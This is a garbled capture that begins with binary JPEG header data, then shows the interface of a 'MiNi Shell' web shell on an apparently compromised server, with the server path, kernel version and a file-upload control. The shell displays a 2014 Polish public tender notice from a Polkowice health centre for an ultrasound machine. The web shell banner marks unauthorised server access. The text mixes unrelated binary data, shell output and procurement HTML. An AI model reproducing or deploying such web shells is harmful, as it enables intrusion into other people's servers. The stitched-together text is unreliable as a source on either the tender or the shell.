JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20141006/330342-N-2014.html

<p class="kh_header"><b>Polkowice: Zakup i dostawa przewoźnego aparatu ultrasonograficznego na potrzeby Polkowickiego Centrum Usług Zdrowotnych - ZOZ S.A               w Polkowicach</b><br>
<b>Numer ogłoszenia: 330342 - 2014; data zamieszczenia: 06.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Polkowickie Centrum Usług Zdrowotnych ZOZ S.A. , ul. K. B. Kominka 7, 59-101 Polkowice, woj. dolnośląskie, tel. 0-76 746 08 00, faks 0-76 746 08 48.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcuz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Podmiot leczniczy - przedsiębiorstwo prowadzące działalność medyczną.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa przewoźnego aparatu ultrasonograficznego na potrzeby Polkowickiego Centrum Usług Zdrowotnych - ZOZ S.A               w Polkowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa przewoźnego aparatu ultrasonograficznego na potrzeby Polkowickiego Centrum Usług Zdrowotnych -  ZOZ S.A w Polkowicach.
I. Szczegółowy opis przedmiotu zamówienia:
Aparat o nowoczesnej konstrukcji i ergonomii pracy. Aparat nowy nieużywany, wyklucza się aparaty demo.  

MINIMALNE PARAMETRY TECHNICZNE ULTRASONOGRAFU:
1.Oferent/Producent - podać,	
2.Nazwa i typ - podać,	
3.Kraj pochodzenia -podać	
4.Aparat USG cyfrowy, najwyższej klasy wyprodukowany w 2014. Wyklucza się aparaty DEMO,	
I. Wymagania ogólne
1.Waga aparatu maksimum 120 kg,	
2. Klawiatura
- zintegrowana klawiatura alfanumeryczna,
- podświetlenie klawiatury,		
3.Monitor
- wysokiej klasy monitor w technologii LED, LCD o przekątnej min 17 cali o rozdzielczości min 1280 x 1024 o kącie widzenia 170 stopni z możliwością regulacji położenia względem pulpitu,
-regulacja wysokości i obrotu pulpitu umożliwiająca obniżenie jego wysokości,	
4. konstrukcja,
- aparat stacjonarny na wózku jezdnym z możliwością blokowania kół,
- min 3 aktywne porty na sondy,
- min 3 gniazda przełączane jednocześnie,
- zakres częstotliwości pracy MHz 1,6-18 MHz, 
- zakres dynamiki dB większy równy 220,
- zintegrowany napęd DVD, 
- zintegrowane głośniki,
- możliwość szybkiego czyszczenia filtrów,
- możliwość zamontowania dodatkowego monitora dla pacjentki,
- Instrukcja obsługi w języku polskim 3 szt. wraz z wersją elektroniczną,
- zasilanie 230 V plus minus 10 procent,
- technologia całkowicie cyfrowa,
- nastawy programowane do aplikacji i głowic oferowanych, tzw. presety,
- liczba kanałów większa niż 50.000,
- możliwość programowania przycisku nożnego,	
5. Ekran dotykowy
- min 7 cali kolorowy dotykowy ekran  co nie wyklucza innego panelu sterowania,
- zawansowany interfejs użytkownika, 
- możliwość konfigurowania (oprogramowanie interaktywne),	
6.Ogólna charakterystyka systemu aplikacji:
- brzuszna,
- układ mięśniowo-szkieletowego,
- naczyniowa,
- pediatrii i noworodków,	
7.Tryby i funkcje obrazowania aparatu. 		
8.Obrazowanie poprzez emisje wiązki nie tylko prostopadle do czoła sondy, ale także ukośnie w wielu płaszczyznach.
opisać	
9.Filtr redukcji szumów ultradźwiękowych pozwalający na zachowanie granic obszarów o różnej echogeniczności.
opisać	
10.Wewnętrzna baza danych pacjentów.podać,	
II.Głowice ultradźwiękowe,
1.Głowica szerokopasmowa typu convex,
- zakres częstotliwości emitowanych przez głowicę 2-5 MHz, 
- Kąt widzenia min. 70 stopni,
- przeznaczenie do badań brzusznych,
- głowica wykonana w technologii głowicy wielorzędowej (min. 3 rzędy kryształów) lub w technologii zastępującej wielorzędową (zapewniająca jednocześnie ogniskowanie zarówno w płaszczyźnie grubości warstwy skanowanej). Liczba elementów w głowicy wielorzędowej min. 570, liczba elementów w głowicy wykonanej w technologii zastępującej wielorzędowej min. 192, lub głowica convex w technice jednorzędowej posiadająca 192 elementy),
opisać,	
2.Głowica liniowa, 
- Zakres częstotliwości obrazowanych przez głowicę 
6-10 MHz (do maks. 40mm) lub 5-18 MHz (do maks. 40mm)
- Przeznaczenie do badań naczyniowych, mięśniowo szkieletowych, badania pediatryczne bioder i jamy brzusznej,  	
3.Głowica liniowa, 
- zakres częstotliwości emitowanych przez głowicę 5-15 lub 4-15 MHz, 
- przeznaczenie do badań małych narządów, stawów i piersi,
- szerokość pola skanowania min 50 mm,
- obrazowanie trapezowe,
- praca w trybie II harmonicznym, 	
III. Opcje (rozbudowa systemu) na dzień składania ofert
1.Możliwość rozbudowy o inne głowice/sondy.	
podać typ	
2.Badanie elastograficzne jakościowe i objętościowe.
opisać,	
3.Możliwość wymiany aparatu na nowszej generacji
(jeżeli taki się pojawi w sprzedaży).	
opisać,	
4.Inne opcje rozbudowy.	
opisać	
IV. Obrazowanie i prezentacja obrazów,
1. Tryb pracy,
- B-mode 2D,
- maksymalna głębokość penetracji do min. 30 cm,
- zakres bezstratnego powiększania obrazu  min 10x,
- częstotliwość odświeżania w trybie B-MODE min   
  1200 obrazów na sekundę,
- zastosowanie technologii optymalizującej obraz w 
-  trybie B-mode w czasie rzeczywistym na poziomie preprocessingu,
-obrazowanie panoramiczne,
- Tryp Doppler kolorowy (CD),
- Regulacja uchylności pola Dopplera Kolorowego min 20 st. dla zaoferowanych głowic liniowych,
- funkcjonalność umożliwiająca równoczesnego wyświetlania obrazów 2D i 2D z kolorem w trybie na żywo,
podać min mierzoną prędkość przepływu min. 370 cm/s,
- Trym M,
- Tryb PD - Power Doppler z opcją kierunku,
- tryb PW - Doppler spektralny z wysokim PRF,
- szerokość regulacja wielości bramki PW-dopplera min 1-15 mm,
- Tryb Triplex  B i CD/PD i CWD,
- Tryb Triplex  B i CD i CWD,
- Doppler mocy,
- możliwość obrazowania harmonicznego na wszystkich zaoferowanych głowicach,
- możliwość zastosowania techniki inwersji fazy. opisać	
2. Zakres ustawień głębokości penetracji w od 1 - 30 cm, 
podać	
3. Zastosowanie technologii optymalizującej obraz.
opisać	
4. Zakres bezstratnego powiększenia obrazu w czasie akwizycji i po tym czasie. 
opisać	
V. Pakiety obliczeniowo - pomiarowe,
1. Badania,
- Jama brzuszna,
- Małe narządy, 
- Układ mięśniowo - szkieletowy, 
opisać	
2. Pomiary na żywo i zamrożonym obrazie,
- Odległości,
- Obwodu,
- Pola powierzchni,
- objętości. 
opisać	
3. Min 9 par kursorów pomiarowych. 
opisać	
4. Pakiet obliczeń automatycznych dla Dopplera (automatyczny obrys spektrum),
opisać	
5. Automatyczny obrys spectrum Dopplera w czasie rzeczywistym obraz na obrazie zamrożonym z pakietami obliczeniowymi. 
opisać	
VI.UPS do aparatur USG,
1. UPS minimalna moc 1500 VA czas podtrzymania przy 100 procent min 5 min, czas przełączania min 4ms;
- gwarancja min. 36 m-cy na podzespoły oraz UPS (system gwarancji door to door).
podać	
2. Papier do videoprintera 20 rolek, 	
VII. System archiwizacji,
1. Możliwość nagrywania i odtwarzania dynamicznych obrazów na nośniki przenośnie DVD/CD. 	
2. Zapis danych odbiorczych zaraz po digitalizacji.		
3. Wideoprinter czarno - biały, 		
4. Pamięć obrazów min 60 000,	
5. Złącze USB do archiwizacji obrazów na pamięci typu flash,	
6. Nagrywarka CD-R/DVD wbudowana w aparat wraz z możliwością zapisu w formatach:
- JPG,
- Avi,
- DICOM, 	
7. Możliwość podłączenia drukarki komputerowej (atramentowej lub laserowej) do drukowania raportów badań w formacie A4.	
8. Możliwość archiwizacji sekwencji ruchomych i statycznych na dysku aparatu,	
9. Możliwość skopiowania archiwalnych dokumentów (obrazów filmów i innych) na nośniki,	
10. Dysk twardy aparatu min. 500 GB,	
11. Możliwość podpięcia do aparatu zewnętrznych dysków HDD i pamięci Pendrive poprzez gniazdo USB o pojemności 80 GB - 1 TB,	
12. Gniazdo do podłączenia dodatkowego monitora dla pacjenta w standardzie HDMI	
13. Wyjście Ethernet do komunikacji w standardzie DICOM,	
14. Możliwość: transmisja danych i obrazów w sieci komputerowej w standardzie DICOM 3.0 minimum WORKLIST PRINT, STORAGE CLASS,	
VIII. Stacja opisowa,
1. KOMPUTER,
- Obudowa typu tower z min. dwoma gniazdami USB 2.0, liczba zainstalowanych wentylatorów: min. 1, Maksymalna liczba zasilaczy 1,
- Procesor czterordzeniowy o częstotliwości procesora min. 3200 częstotliwość magistrali min. 1600 MHz lub równoważny,
- pamięć DDR3 1x8GB, minimalne taktowanie 1600 MHz lub równoważne,
- dysk twardy SATA III 1 TB, cache 64 MB,
- płyta główna 4 złącza SERIAL ATA, 1, 4 Gniazda USB 2.0, 2 Gniazda USB 3.0, ilość Gniazd Pamięci 4, LAN 1 Gbit, 1xRJ45, 
- zintegrowana karta graficzna złącze HDMI,
- zintegrowana karta dźwiękowa,
- napęd optyczny Nagrywarka Blu-Ray SATA. Obsługiwane formaty odczytu CD: CD-R, CD-RW, CD-ROM, CD-DA. Obsługiwane formaty odczytu DVD: DVD-ROM, DVD plus minus R, DVD plus minus R DL, DVD plus minus RW, DVD-RAM. Obsługiwane formaty odczytu Blu-Ray: BD-R (SL), BD-R (DL), BD-R (QL), BD-R (TL), BD-RE (DL), BD-RE (SL), BD-ROM (DL), BD-ROM (SL),
- Zasilacz o mocy nie mniejszej niż 500W,
- klawiatura USB, myszka USB, listwa zasilająca (przeciwprzepięciowa), podkładka,
- Zasilacz UPS moc rzeczywista 670W, czas podtrzymania przy 100 procent min 5 min, czas przełączania min 4ms,
- gwarancja min. 36 m-cy na podzespoły oraz UPS (system gwarancji door to door), opisać,	
2. OPROGRAMOWANIE SYSTEMOWE,
- Windows 8.1 Pro PL. Oprogramowanie umożliwiające bezproblemowe działanie oprogramowania producenta KAMSOFT - KS-SOMED oraz SYNEKTIK - PACS, 
- MS Office 2013 PL PKC lub równoważne,
- Licencja Kamsoft KS-SOMED (Medycyna) (roczna licencja),

Możliwość rozbudowy systemu o:
- Licencja ArPACS SRV: licencja na podłączenie urządzenia DICOM - System PACS-USG, Licencja obsługi worklist dla urządzenia DICOM USG, konfiguracja serwera i bazy danych ArPACS SRV na posiadanym serwerze PACS, Licencja na połączenie aparatu USG do systemu posiadanego u zamawiającego PACS/RIS.
Na potwierdzenie możliwości ww. rozbudowy systemu Wykonawca winien dostarczyć oświadczenie o możliwości integracji w zakresie rozbudowy systemu
- Licencja Kamsoft KS-SOMED RIS (roczna licencja): Licencja na podłączenie do urządzenia poprzez DICOM - System RIS-USG; Licencja obsługi worklist dla urządzenia DICOM USG; konfiguracja do poprawnego działania z systemem PACS posiadanym u Zamawiającego, 
Na potwierdzenie możliwości ww. rozbudowy systemu Wykonawca winien dostarczyć oświadczenie o możliwości integracji w zakresie rozbudowy systemu, opisać	
3. Możliwość rozbudowy systemu o:
Integrację z oprogramowaniem KS - SOMED przez moduł KS - RIS: (komunikacji pomiędzy systemem KS-SOMED, a
systemem obsługi pracowni USG - PACS z
wykorzystaniem protokołu HL7) rezerwowanie zleceń na badania diagnostyczne, opisywanie badań, dystrybucja wprowadzonych bezpośrednio w module KS-RIS,
- przeglądanie oraz rezerwowanie skierowań na badania
diagnostyczne, wystawionych w modułach systemu
KS-SOMED: Gabinet oraz Zlecenia.
- wysyłanie z posiadanych stacji u Zamawiającego (KS-SOMED/ Moduł Gabinet) zleceń na badania diagnostyczne do systemu obsługi pracowni USG - PACS z wykorzystaniem
protokołu HL7,
- oprogramowanie korzystające wyłącznie z bazy danych PACS,
- zapewnienie możliwości odtwarzania badań diagnostycznych i opisów poprzez posiadane już 5 licencji pływających przez Zamawiającego (oprogramowanie KS-SOMED oraz PACS, licencja przyznana użytkownikowi systemu, a nie stacji)
- interfejs jak również pomoc kontekstowa w języku polskim,
- integracja i synchronizacja danych obrazowych z obecnie użytkowanym systemem informatycznym PACS - ArPACS w zakresie archiwizacji w standardzie DICOM (PACS / DICOM) jak również z systemem klasy HIS/RIS - KS-SOMED (RIS/WORKLIST), opisać	
4. OPROGRAMOWANIE ZABEZPIECZAJĄCE,
(program antywirusowy)
Kompatybilne z dostarczonym systemem operacyjnym.
Pakiet typu Internet Security zapewniający aktywną ochronę komputera przed szkodliwym oprogramowaniem
z aktualizacjami przez okres 36 miesięcy zawierający:
- Ochronę w czasie rzeczywistym przed wszystkimi typami zagrożeń
- Ochrona powinna obejmować system operacyjny oraz oprogramowanie internetowe.
- Skaner antywirusowy.
- Monitor antywirusowy.
- Zaporę sieciową.
- Narzędzia do wykrywania niebezpiecznego oprogramowania.
- Automatyczną aktualizację oprogramowania ochronnego oraz sygnatur.
- Licencja min. 36 miesięcy, opisać.	
5. URZĄDZENIA PRERYFERYJNE,
- Drukarka laserowa mono jednostronna: HP LaserJet 1102w, min. 2 podajniki na papier, równoważna lub lepsza plus dodatkowy toner (wydajność min. 1 600 str.),
- monitor kolorowy LED o parametrach minimalnych 24 cale rozdzielczość ekranu wynosi 1920 x 1080 pikseli, jasność  250 cd/m2, wyposażony w złącze HDMI, równoważny lub lepszy;
- gwarancja min. 36 m-cy na monitor oraz drukarkę. (system gwarancji door to door), opisać,	
6. OKABLOWANIE,
- komputer-monitor: HDMI,
- komputer-drukarka: USB 3m,
- USG-drukarka: USB 3m,
- komputer-sieć LAN: patchcord 3m kat. 5,
- USG-sieć LAN: patchcord 3m kat. 5,
- przewód zasilający do komputera,
- przewód zasilający do drukarki.	
IX. Pozostałe,
1.. Szkolenie personelu w zakresie eksploatacji i obsługi aparatu oraz oprogramowania w miejscu instalacji u Zamawiającego min. 2 dni,
Podać ile,	
2.Okres gwarancji na cały system min. 36 miesiące i bezpłatny serwis i wsparcie techniczne w okresie gwarancyjnym. Gwarancja liczona od uruchomienia i oddania do eksploatacji aparatu oraz przeprowadzenia szkolenia wstępnego pracowników wskazanych przez Zamawiającego z chwilą uruchomienia aparatu.	
Podać ile,	
3.Certyfikaty i inne dokumenty dopuszczające aparat do  użytkowania na terenie Polski i UE wymagane obowiązującymi przepisami prawa, jak: atest , certyfikaty CE, deklaracje zgodności - zgodnie z Ustawą z dnia 20 kwietnia 2004 roku o wyrobach medycznych (Dz. U. Nr 93, poz. 896 z późniejszymi zmianami), 
dołączyć do oferty,	
4.Autoryzowany przez producenta aparatu serwis gwarancyjny i pogwarancyjny na ternie Polski, podać gdzie,	
5.Gwarancja dostępności części zamiennych w okresie po sprzedaży urządzenia	Min. 10 lat,	
6.Przeglądy aparatu w okresie trwania gwarancji (bezpłatnie) w tym nowelizacja oprogramowania Min 1 przegląd / rok,	
7.Czas reakcji od zgłoszenia	Maks 48 h,	
8.Serwis gwarancyjny i pogwarancyjny - czas naprawy od momentu zgłoszenia awarii aparatu.Maks 5 dni, 
	
9.W przypadku napraw powyżej 5 dni aparat zastępczy o parametrach nie gorszych.		

Uwaga:
1.Wszystkie minimalne parametry graniczne w powyższej tabeli są parametrami bezwzględnie wymaganymi, których niespełnienie spowoduje odrzucenie ofert.
2.Wykonawca zobowiązany jest do podania wartości parametrów w jednostkach fizycznych wskazanych w powyższej tabeli.
3.Wszystkie zaoferowane parametry i wysokości podane w zestawieniu muszą dotyczyć oferowanego aparatu. 
4.Użyte przez zamawiającego nazwy handlowe, znaki towarowe są uzasadnione z specyfikacją przedmiotu zamówienia i mają na celu wskazanie jakości zamówienia. 
5.Ze względu na standaryzację oprogramowania w Polkowickim Centrum Usług Zdrowotnych powyższy sprzęt komputerowy musi mieć zainstalowany system operacyjny oryginalny Windows 8.1 Professional PL i program biurowy oryginalny MS Office 2013 PL BOX oraz oprogramowanie KS-SOMED.
6.Zamawiający dopuszcza zastosowanie materiałów i produktów równoważnych do wskazanych w niniejszej specyfikacji i załączonym do niej Opisie przedmiotu zamówienia. Warunkiem zastosowania materiałów i produktów równoważnych jest posiadanie przez te materiały i produkty parametrów technicznych nie gorszych niż wskazane w niniejszej specyfikacji.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Wartość zamówienia uzupełniającego wynosi 20 % zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.11.22.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium:
1.	Oferta musi być zabezpieczona wadium w wysokości: 7.356,00 zł.  zł. (słownie: siedem tysięcy trzysta pięćdziesiąt sześć złotych).

Wykonawca, który nie wniesie wadium w ww. kwocie zostanie wykluczony zgodnie z art. 24 ust. 2, pkt. 4.
2.	Wadium musi obejmować okres związania ofertą, tj. 30 dni od terminu składania ofert. Dostawca wnoszący wadium w niżej wymienionych formach jest zobowiązany do niezwłocznego przedłużenia jego ważności - w przypadku gdy będą tego wymagały warunki prowadzonej procedury zamówienia.
3.	Termin wniesienia wadium upływa dnia 15.10.2014 r. o godzinie 11:00
4.	W przypadku wnoszenia wadium w formie pieniężnej za termin wniesienia wadium przyjmuje się datę uznania rachunku bankowego Zamawiającego. 
5.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: BS Wschowa o/Polkowice,  nr konta: 89 8669 0001 0141 6844 2000 0015 lub w Kasie Polkowickiego Centrum Usług Zdrowotnych ZOZ-S.A., ul. K. B. Kominka 7, 59-100 Polkowice.
6.	Wadium można wnieść w formie: 
6.1.	pieniężnej;  
6.2.	poręczenia bankowego lub poręczenia spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręcznie kasy jest zawsze poręczeniem pieniężnym;  
6.3.	gwarancji bankowej; 
6.4.	gwarancji ubezpieczeniowej; 
6.5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 42/2007 poz. 275 z późn. zm.).
Uwaga! 
Oryginał: poręczenia bankowego lub poręczenia spółdzielczej kasy oszczędnościowo-kredytowej; gwarancji bankowej; gwarancji ubezpieczeniowej, poręczenia o którym mowa  w pkt. 6.2 SIWZ należy złożyć w Kasie przy ul. K.B. Kominka 7 w Polkowicach do dnia 15.10.2014 r. do godz. 11:00. Wadium wnoszone w  formach gwarancji lub poręczenia będzie akceptowane, pod warunkiem, że jego treść będzie zawierała wszystkie przypadki utraty wadium przez Wykonawcę określone w art. 46 ust. 4a i 5 ustawy Pzp, a okres ważności wadium nie będzie krótszy niż okres związania ofertą określony w SIWZ. 
7.	Kopię dokumentu potwierdzającego wniesienie wadium należy załączyć do oferty. 
8.	Wadium będzie zwrócone w terminie i na warunkach wskazanych 
 w art. 46 ust. 1 i 2  pzp. 
8.1.	W przypadku wadium wniesionego w pieniądzu zwrot nastąpi przelewem na rachunek bankowy Wykonawcy. Zamawiający zwraca kwotę wadium wraz 
z odsetkami wynikającymi z umowy rachunku bankowego, na którym była ona przechowywana, po odliczeniu kosztów prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek, którego oferta została wybrana.            W ofercie należy podać numer konta, na jakie zamawiający dokonuje zwrotu wadium.
8.2.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca 
w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 pzp nie złożył dokumentów lub oświadczeń o których mowa w art. 25 ust.1 pzp lub pełnomocnictw, chyba że udowodnił że wynika to z przyczyn nieleżących po jego stronie.
8.3.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
8.3.1.	odmówił podpisania umowy w sprawie zamówienia publicznego na  warunkach określonych w ofercie;
8.3.2.	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
8.3.3.	zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący uprawnień do wykonywania określonej działalności lub czynności, jeżeli złoży oświadczenie sporządzone wg załącznika nr 1 do Rozdziału I SIWZ. Warunek będzie oceniany według formuły spełnia/nie spełnia w oparciu              o oświadczenie, sporządzone wg załącznika nr 1 do rozdziału I SIWZ złożone przez Wykonawcę w celu potwierdzenia spełniania warunku udziału w postępowaniu. Niespełnienie, chociaż jednego z wymaganych warunków skutkować będzie wykluczeniem Wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna że Wykonawca spełnia warunek wiedzy i doświadczenia, jeżeli wykaże wykonane lub wykonywane  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 3 (trzech) zamówień w zakresie dostaw ultrasonografu, o wartości  nie mniejszej niż 250.000,00 PLN brutto każda,   z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów potwierdzających, że dostawy zostały wykonane w sposób należyty.
Dowodami  o których mowa powyżej są: 1) poświadczenie, z tym że w odniesieniu do nadal wykonywanych dostaw lub okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert, 2) w przypadku zamówień na dostawy - oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn                  o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia,   o którym mowa powyżej. Jeżeli załączony wykaz wykonanych dostaw będzie potwierdzać wartość tych dostaw w walucie innej niż PLN, Wykonawca powinien dokonać przeliczenia na PLN według średniego kursu NBP z dnia, w którym ogłoszenie o zamówieniu zostało opublikowane w Biuletynie Zamówień Publicznych. W przypadku gdy w przedstawionym wykazie wskazane zostaną przez Wykonawcę wartości w walucie innej niż PLN, Zamawiający dokona przeliczenia na PLN według kursu średniego NBP z dnia, w którym ogłoszenie  o zamówieniu zostało opublikowane w Biuletynie Zamówień Publicznych. Zamawiający uzna warunki za spełnione, gdy przedłożone dokumenty będą zgodne z wymogami niniejszej SIWZ oraz Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. (Dz. U. z 2013 r. poz. 231) w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane. Zamawiający oceni spełnienie 